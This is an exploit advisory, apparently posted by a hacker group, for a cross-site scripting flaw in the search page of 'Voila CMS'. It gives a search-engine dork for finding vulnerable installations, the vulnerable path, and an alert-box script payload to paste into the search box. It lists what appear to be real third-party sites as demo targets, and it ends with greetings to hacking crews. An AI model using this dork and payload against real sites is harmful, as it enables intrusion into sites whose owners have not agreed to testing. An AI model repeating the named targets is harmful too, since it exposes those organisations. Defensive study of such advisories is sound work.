#####################
#Exploit Title:Voila Cms Xss Vulnerability.
#Exploit Author:Darksnipper & Dr.v!ru$
#Home:www.cybercoders.org
#Email:Darksnipper@live.com
#Cms Link:http://www.voilasyria.com
#Tested On : windows 7 & linux.
#Dork:intext:powerd by voila
#P.o.c
open
http://site.com/path/view/search/viewSearch.php
put in search bar
<script>alert("xss by Darksnipper")</script>
Boom Done Its Vulnerable to xss
Demo:
http://voitest.com/ithad/view/search/viewSearch.php
put in Search box
<script>alert("xss by Darksnipper")</script>
example No 2
http://www.arabengineeringindustries.org/view/search/viewSearch.php
Same put this in search box nd click the side button:
<script>alert("xss by Darksnipper")</script>
#Greetz:Dream.killer,Soul~Inj3ct0r,Error
Haxor,1337,H4xorl1f3,shadow008,x3o-1337,SOG,Dr.z0mbie,P4k-command3r,Over-x,Zhc
Snipper,Asif Iqbal,Junaid Hussain,Madc0de Haxor,Code Smasher,Z company
Hacking Crew, Kashmiri Hackers,Madleets Team,PakHack Team,3xp1r3 Cyber
Army & All Freedom Fighters.
#####################
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information